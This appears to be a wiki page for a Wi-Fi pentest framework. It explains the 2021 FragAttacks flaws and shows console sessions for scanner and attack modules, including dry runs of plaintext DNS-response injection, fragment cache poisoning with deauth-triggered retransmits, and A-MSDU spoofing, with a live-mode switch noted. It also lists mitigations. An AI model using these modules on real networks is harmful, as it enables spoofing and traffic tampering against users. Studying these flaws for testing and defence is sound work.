-
Notifications
You must be signed in to change notification settings - Fork 2
FragAttacks
FragAttacks (Fragmentation and Aggregation Attacks) is a set of design and implementation flaws in the 802.11 Wi-Fi standard. Discovered by Mathy Vanhoef and published in 2021, they affect virtually all Wi-Fi devices regardless of security protocol (WEP, WPA, WPA2, WPA3).
| CVE | Name | Type | CVSS | Status |
|---|---|---|---|---|
| CVE-2020-26139 | Forwarding of EAPOL frames | Design flaw | 5.3 | Disclosed May 2021 |
| CVE-2020-26140 | Plaintext injection in non-strict APs | Design flaw | 6.5 | Disclosed May 2021 |
| CVE-2020-26141 | Fragment cache abuse | Design flaw | 6.5 | Disclosed May 2021 |
| CVE-2020-26142 | Fragment processed as full frame | Design flaw | 5.3 | Disclosed May 2021 |
| CVE-2020-26143 | Mixed plaintext/encrypted fragment acceptance | Design flaw | 6.5 | Disclosed May 2021 |
| CVE-2020-26144 | Accept plaintext broadcast fragments | Implementation | 6.5 | Disclosed May 2021 |
| CVE-2020-26145 | Accept plaintext broadcast non-SPP A-MSDU | Implementation | 6.5 | Disclosed May 2021 |
| CVE-2020-26146 | Reassemble fragments with non-consecutive pn | Implementation | 5.3 | Disclosed May 2021 |
| CVE-2020-26147 | Reassemble mixed encrypted/plaintext fragments | Implementation | 5.3 | Disclosed May 2021 |
| Module | Description |
|---|---|
fragattacks/fragattacks_scanner |
Passive scanner detecting FragAttacks-vulnerable APs by beacon flags |
fragattacks/fragattacks_cve_2020_26140 |
CVE-2020-26140 - Plaintext data injection in non-strict WPA2 APs |
fragattacks/fragattacks_cve_2020_26141 |
CVE-2020-26141 - Fragment cache abuse / non-contiguous fragment injection |
fragattacks/fragattacks_cve_2020_26143 |
CVE-2020-26143 - Mixed plaintext/encrypted fragment acceptance |
wifi_lab/fragattacks |
Full FragAttacks suite (wrapper for all modules) |
Large 802.11 frames can be fragmented into smaller pieces for transmission. Each fragment carries:
- A fragment number (0-15)
- A more-fragments bit (1 if more fragments follow, 0 for last)
- The same sequence number as the original frame
The receiver reassembles fragments by matching sequence numbers and tracking the more-fragments bit.
CVE-2020-26140 / 26143 (plaintext/mixed injection): Some APs accept and forward plaintext data frames during an active WPA2 session. An attacker can inject plaintext frames as fragments that the AP reassembles and forwards to a target inside the protected network.
CVE-2020-26141 (fragment cache abuse): Fragments remain in cache for 10+ seconds. An attacker can poison the fragment cache by injecting a malicious first fragment, wait for a legitimate retransmission of a second fragment, and have the AP reassemble the poisoned combined frame.
wxf > use generic/wifi_lab/fragattacks/fragattacks_scanner
wxf (FragAttacksScanner) > set INTERFACE wlan0mon
wxf (FragAttacksScanner) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (FragAttacksScanner) > run
[*] Scanning AA:BB:CC:DD:EE:FF for FragAttacks vulnerabilities...
[*] Probe 1: checking 802.11n/ac/ax beacon flags (protected management frames)...
[*] Probe 2: checking TKIP fragment handling...
[*] Probe 3: checking A-MSDU subframe header spoofing...
[*] Probe 4: checking plaintext fragment injection acceptance...
Results:
CVE-2020-26140: LIKELY VULNERABLE (no SPP A-MSDU support detected)
CVE-2020-26141: LIKELY VULNERABLE (fragment cache timeout > 5s)
CVE-2020-26143: CHECKING - requires active association test
CVE-2020-26144: NOT TESTED (requires association)
PMF enabled: no (makes CVE-2020-26139 easier)
[*] Recommend: test CVE-2020-26140 and CVE-2020-26141 with associated client
Impact: An attacker can inject arbitrary plaintext IP packets into a WPA2-protected network by exploiting APs that accept non-strict plaintext data frames.
Attack scenario: Inject a DNS response pointing to an attacker-controlled IP, causing clients to connect to a malicious server.
wxf > use generic/wifi_lab/fragattacks/fragattacks_cve_2020_26140
wxf (FragAttacks-26140) > show options
Options:
INTERFACE wlan0mon Monitor mode interface
TARGET_BSSID (required) Target AP BSSID
TARGET_IP (required) Target client IP address
INJECT_TYPE dns Payload type (dns, arp, icmp, raw)
DNS_NAME example.com DNS name to spoof (for dns type)
DNS_IP 10.0.0.1 Spoofed DNS response IP
SIMULATE true Dry-run
wxf (FragAttacks-26140) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (FragAttacks-26140) > set TARGET_IP 192.168.1.50
wxf (FragAttacks-26140) > set INJECT_TYPE dns
wxf (FragAttacks-26140) > set DNS_NAME updates.company.com
wxf (FragAttacks-26140) > set DNS_IP 10.10.10.10
wxf (FragAttacks-26140) > set SIMULATE true
wxf (FragAttacks-26140) > run
[SIMULATE] CVE-2020-26140: Plaintext fragment injection
[SIMULATE] Target AP: AA:BB:CC:DD:EE:FF
[SIMULATE] Target client: 192.168.1.50
[SIMULATE] Payload: DNS response for updates.company.com -> 10.10.10.10
[SIMULATE] Frame construction:
[SIMULATE] Header: ToDS=1 FromDS=0 fragment=0 moreFrag=1 protected=0
[SIMULATE] Addr1 (recv): AA:BB:CC:DD:EE:FF (AP)
[SIMULATE] Addr2 (src): spoofed client MAC
[SIMULATE] Addr3 (dest): 192.168.1.50
[SIMULATE] Payload: UDP DNS response (spoofed)
[SIMULATE] Expected behavior on vulnerable AP:
[SIMULATE] AP forwards plaintext frame to target client
[SIMULATE] Client receives spoofed DNS response
[SIMULATE] Client resolves updates.company.com to 10.10.10.10
[!] Set SIMULATE=false to inject live
[!] PREREQ: wlan0mon in monitor mode | Associated client at 192.168.1.50
[!] NOTE: Requires AP that does not enforce 802.11w (PMF)
Impact: By injecting a malicious first fragment into the AP's fragment reassembly cache, an attacker can intercept or modify legitimate traffic when the original sender retransmits subsequent fragments.
wxf > use generic/wifi_lab/fragattacks/fragattacks_cve_2020_26141
wxf (FragAttacks-26141) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (FragAttacks-26141) > set TARGET_IP 192.168.1.50
wxf (FragAttacks-26141) > set SIMULATE true
wxf (FragAttacks-26141) > run
[SIMULATE] CVE-2020-26141: Fragment cache poisoning
[SIMULATE] Step 1: Inject malicious first fragment (frag=0, moreFrag=1)
[SIMULATE] Malicious fragment sent to AP cache under sequence number X
[SIMULATE] Cache entry: seq=X frag=0 -> [malicious payload]
[SIMULATE] Step 2: Wait for legitimate fragment frag=1 from target
[SIMULATE] Triggering retransmit via deauth... (simulated)
[SIMULATE] Step 3: AP reassembles: [malicious frag 0] + [legitimate frag 1]
[SIMULATE] Combined frame forwarded to target with partial attacker control
[SIMULATE] Fragment cache timeout: 10s (window for step 2)
[SIMULATE] Expected outcome: partial payload modification of target traffic
[!] Set SIMULATE=false to run live
[!] This attack requires precise timing and a vulnerable AP
Impact: Some APs and drivers accept A-MSDU frames that start with a plaintext RFC 1042 header, allowing an attacker to have arbitrary data interpreted as a subframe of a legitimate encrypted A-MSDU.
wxf > use generic/wifi_lab/fragattacks/fragattacks_cve_2020_26143
wxf (FragAttacks-26143) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (FragAttacks-26143) > set SIMULATE true
wxf (FragAttacks-26143) > run
[SIMULATE] CVE-2020-26143: Mixed plaintext/encrypted fragment
[SIMULATE] Constructing A-MSDU with spoofed plaintext RFC 1042 header
[SIMULATE] Outer frame: encrypted CCMP (looks legitimate to driver)
[SIMULATE] Inner subframe header: plaintext (spoofed destination + EtherType)
[SIMULATE] Payload: attacker-controlled data injected into decrypted result
[SIMULATE] Vulnerable implementations: affected Linux mac80211, some Broadcom drivers
[SIMULATE] Test probes sent: 3 (CCMP with A-MSDU flag set)
[SIMULATE] Analysis: checking beacon IE for A-MSDU support flags
[!] Set SIMULATE=false to test live
[!] PREREQ: Associated STA on target AP network
The wrapper module runs all three primary FragAttacks CVEs sequentially:
wxf > use generic/wifi_lab/fragattacks
wxf (FragAttacks) > set INTERFACE wlan0mon
wxf (FragAttacks) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (FragAttacks) > set SIMULATE true
wxf (FragAttacks) > run
[SIMULATE] FragAttacks full suite
[SIMULATE] Target: AA:BB:CC:DD:EE:FF
[SIMULATE] [1/3] CVE-2020-26140: plaintext injection test... LIKELY_VULNERABLE
[SIMULATE] [2/3] CVE-2020-26141: fragment cache test... LIKELY_VULNERABLE
[SIMULATE] [3/3] CVE-2020-26143: mixed fragment test... INCONCLUSIVE
[SIMULATE] Summary:
CVE-2020-26140: LIKELY VULNERABLE
CVE-2020-26141: LIKELY VULNERABLE
CVE-2020-26143: INCONCLUSIVE (requires active association)
[!] Set SIMULATE=false to run live tests
- Apply Wi-Fi driver and firmware updates from vendors
- Enable PMF (Protected Management Frames / 802.11w) where supported
- Use encrypted tunnels (VPN, TLS) over Wi-Fi to mitigate plaintext injection
- Fragment cache attacks are mitigated by some modern drivers that clear the cache on reconnect
References:
Related pages: KRACK | Wi-Fi Attacks | Configuration
Author: Andre Henrique (@mrhenrike) | Uniao Geek
Primeiros Passos
Ataques Wireless
Drones e UAV
Protocolos Especializados
Ferramentas de Pentest
Hardware